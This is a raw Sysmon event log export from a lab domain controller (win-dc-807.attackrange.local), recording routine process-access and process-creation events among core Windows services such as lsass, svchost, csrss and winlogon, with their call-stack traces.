15:51:00.503{D28789B6-7C64-5FA1-0C00-000000008801}608728C:\Windows\system32\svchost.exe{D28789B6-7C62-5FA1-0900-000000008801}780C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+796b|c:\windows\system32\lsm.dll+2387f|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000758Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:00.503{D28789B6-7C64-5FA1-0C00-000000008801}608728C:\Windows\system32\svchost.exe{D28789B6-7C62-5FA1-0900-000000008801}780C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+2380c|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000757Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:00.503{D28789B6-7C64-5FA1-0C00-000000008801}608728C:\Windows\system32\svchost.exe{D28789B6-7C62-5FA1-0900-000000008801}780C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+237c4|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000756Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:00.503{D28789B6-7C64-5FA1-0C00-000000008801}608728C:\Windows\system32\svchost.exe{D28789B6-7C62-5FA1-0500-000000008801}644C:\Windows\system32\csrss.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+1a7a4|c:\windows\system32\lsm.dll+1aa31|C:\Windows\SYSTEM32\ntdll.dll+1d3f1|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000755Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:00.503{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C62-5FA1-0800-000000008801}724C:\Windows\system32\csrss.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+1a7a4|c:\windows\system32\lsm.dll+1aa31|C:\Windows\SYSTEM32\ntdll.dll+1d3f1|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000754Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:00.503{D28789B6-7C64-5FA1-0C00-000000008801}6081036C:\Windows\system32\svchost.exe{D28789B6-7C62-5FA1-0800-000000008801}724C:\Windows\system32\csrss.exe0x101000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\lsm.dll+1ac1c|c:\windows\system32\lsm.dll+22cc9|c:\windows\system32\lsm.dll+bcaf|c:\windows\system32\lsm.dll+373fc|c:\windows\system32\lsm.dll+158f9|c:\windows\system32\lsm.dll+36198|c:\windows\system32\lsm.dll+3530a|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000753Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:00.503{D28789B6-7C64-5FA1-0C00-000000008801}6081036C:\Windows\system32\svchost.exe{D28789B6-7C62-5FA1-0900-000000008801}780C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+1abf6|c:\windows\system32\lsm.dll+22cc9|c:\windows\system32\lsm.dll+bcaf|c:\windows\system32\lsm.dll+373fc|c:\windows\system32\lsm.dll+158f9|c:\windows\system32\lsm.dll+36198|c:\windows\system32\lsm.dll+3530a|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000752Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:00.503{D28789B6-7C64-5FA1-0C00-000000008801}6081036C:\Windows\system32\svchost.exe{D28789B6-7C62-5FA1-0900-000000008801}780C:\Windows\system32\winlogon.exe0x100000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\lsm.dll+1abdc|c:\windows\system32\lsm.dll+22cc9|c:\windows\system32\lsm.dll+bcaf|c:\windows\system32\lsm.dll+373fc|c:\windows\system32\lsm.dll+158f9|c:\windows\system32\lsm.dll+36198|c:\windows\system32\lsm.dll+3530a|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000751Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:00.503{D28789B6-7C64-5FA1-0C00-000000008801}6081036C:\Windows\system32\svchost.exe{D28789B6-7C62-5FA1-0500-000000008801}644C:\Windows\system32\csrss.exe0x101000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\lsm.dll+1ac1c|c:\windows\system32\lsm.dll+22cc9|c:\windows\system32\lsm.dll+bcaf|c:\windows\system32\lsm.dll+3735d|c:\windows\system32\lsm.dll+158f9|c:\windows\system32\lsm.dll+36198|c:\windows\system32\lsm.dll+3530a|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000750Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:00.503{D28789B6-7C64-5FA1-0C00-000000008801}6081036C:\Windows\system32\svchost.exe{D28789B6-7C62-5FA1-0700-000000008801}716C:\Windows\system32\wininit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+1abf6|c:\windows\system32\lsm.dll+22cc9|c:\windows\system32\lsm.dll+bcaf|c:\windows\system32\lsm.dll+3735d|c:\windows\system32\lsm.dll+158f9|c:\windows\system32\lsm.dll+36198|c:\windows\system32\lsm.dll+3530a|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000749Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:00.503{D28789B6-7C64-5FA1-0C00-000000008801}6081036C:\Windows\system32\svchost.exe{D28789B6-7C62-5FA1-0700-000000008801}716C:\Windows\system32\wininit.exe0x100000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\lsm.dll+1abdc|c:\windows\system32\lsm.dll+22cc9|c:\windows\system32\lsm.dll+bcaf|c:\windows\system32\lsm.dll+3735d|c:\windows\system32\lsm.dll+158f9|c:\windows\system32\lsm.dll+36198|c:\windows\system32\lsm.dll+3530a|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000748Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:00.503{D28789B6-7C61-5FA1-0200-000000008801}448632C:\Windows\System32\smss.exe{D28789B6-7C64-5FA1-0C00-000000008801}608C:\Windows\system32\svchost.exe0x101441C:\Windows\SYSTEM32\ntdll.dll+a6624|\SystemRoot\System32\smss.exe+3fee|\SystemRoot\System32\smss.exe+3b53|C:\Windows\SYSTEM32\ntdll.dll+1d3f1|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000747Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:00.457{D28789B6-7C62-5FA1-0B00-000000008801}868992C:\Windows\system32\lsass.exe{D28789B6-7C62-5FA1-0700-000000008801}716C:\Windows\system32\wininit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25dfa|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000746Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:00.457{D28789B6-7C62-5FA1-0B00-000000008801}868992C:\Windows\system32\lsass.exe{D28789B6-7C62-5FA1-0700-000000008801}716C:\Windows\system32\wininit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+64ebf|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000745Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:00.457{D28789B6-7C64-5FA1-0C00-000000008801}608920C:\Windows\system32\svchost.exe{D28789B6-7C64-5FA1-0D00-000000008801}1000C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+46888|c:\windows\system32\rpcss.dll+3a983|c:\windows\system32\rpcss.dll+3a8ee|C:\Windows\System32\RPCRT4.dll+50b34|C:\Windows\System32\RPCRT4.dll+25cd0|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000744Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:00.441{D28789B6-7C62-5FA1-0B00-000000008801}868992C:\Windows\system32\lsass.exe{D28789B6-7C62-5FA1-0A00-000000008801}852C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000743Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:00.441{D28789B6-7C62-5FA1-0B00-000000008801}868992C:\Windows\system32\lsass.exe{D28789B6-7C64-5FA1-0D00-000000008801}1000C:\Windows\system32\svchost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000742Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:00.441{D28789B6-7C62-5FA1-0B00-000000008801}868992C:\Windows\system32\lsass.exe{D28789B6-7C64-5FA1-0D00-000000008801}1000C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+64ebf|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000741Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:00.425{D28789B6-7C62-5FA1-0A00-000000008801}852936C:\Windows\system32\services.exe{D28789B6-7C64-5FA1-0D00-000000008801}1000C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+64ebf|C:\Windows\system32\services.exe+18ff|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+2e43b|C:\Windows\System32\RPCRT4.dll+6213a|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000740Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:00.425{D28789B6-7C62-5FA1-0500-000000008801}644804C:\Windows\system32\csrss.exe{D28789B6-7C64-5FA1-0D00-000000008801}1000C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000739Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:00.425{D28789B6-7C62-5FA1-0A00-000000008801}852856C:\Windows\system32\services.exe{D28789B6-7C64-5FA1-0D00-000000008801}1000C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|C:\Windows\system32\services.exe+12939|C:\Windows\system32\services.exe+66f4|C:\Windows\system32\services.exe+52f1|C:\Windows\system32\services.exe+d7ae|C:\Windows\system32\services.exe+19bbb|C:\Windows\system32\services.exe+1d91b|C:\Windows\system32\services.exe+22933|C:\Windows\system32\services.exe+23dec|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000738Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:00.410{D28789B6-7C62-5FA1-0B00-000000008801}868992C:\Windows\system32\lsass.exe{D28789B6-7C62-5FA1-0A00-000000008801}852C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000737Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:00.394{D28789B6-7C62-5FA1-0B00-000000008801}868900C:\Windows\system32\lsass.exe{D28789B6-7C64-5FA1-0C00-000000008801}608C:\Windows\system32\svchost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000736Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:00.394{D28789B6-7C62-5FA1-0B00-000000008801}868900C:\Windows\system32\lsass.exe{D28789B6-7C64-5FA1-0C00-000000008801}608C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+64ebf|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000735Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:00.394{D28789B6-7C62-5FA1-0B00-000000008801}868992C:\Windows\system32\lsass.exe{D28789B6-7C62-5FA1-0A00-000000008801}852C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000734Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:00.269{D28789B6-7C62-5FA1-0A00-000000008801}852936C:\Windows\system32\services.exe{D28789B6-7C64-5FA1-0C00-000000008801}608C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+64ebf|C:\Windows\system32\services.exe+18ff|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+2e43b|C:\Windows\System32\RPCRT4.dll+6213a|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000733Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:00.269{D28789B6-7C62-5FA1-0500-000000008801}644660C:\Windows\system32\csrss.exe{D28789B6-7C64-5FA1-0C00-000000008801}608C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000732Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:00.269{D28789B6-7C62-5FA1-0A00-000000008801}852856C:\Windows\system32\services.exe{D28789B6-7C64-5FA1-0C00-000000008801}608C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|C:\Windows\system32\services.exe+12939|C:\Windows\system32\services.exe+66f4|C:\Windows\system32\services.exe+5154|C:\Windows\system32\services.exe+d7ae|C:\Windows\system32\services.exe+19e30|C:\Windows\system32\services.exe+19b29|C:\Windows\system32\services.exe+1d91b|C:\Windows\system32\services.exe+22933|C:\Windows\system32\services.exe+23dec|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000731Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:00.279{D28789B6-7C64-5FA1-0C00-000000008801}608C:\Windows\System32\svchost.exe10.0.14393.0 (rs1_release.160715-1616)Host Process for Windows ServicesMicrosoft® Windows® Operating SystemMicrosoft Corporationsvchost.exeC:\Windows\system32\svchost.exe -k DcomLaunchC:\Windows\system32\NT AUTHORITY\SYSTEM{D28789B6-7C62-5FA1-E703-000000000000}0x3e70SystemMD5=36F670D89040709013F6A460176767EC,SHA256=438B6CCD84F4DD32D9684ED7D58FD7D1E5A75FE3F3D12AB6C788E6BB0FFAD5E7,IMPHASH=2CED93915677390B76EE1916B92F3EF6{D28789B6-7C62-5FA1-0A00-000000008801}852C:\Windows\System32\services.exeC:\Windows\system32\services.exe 10341000x8000000000000000730Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 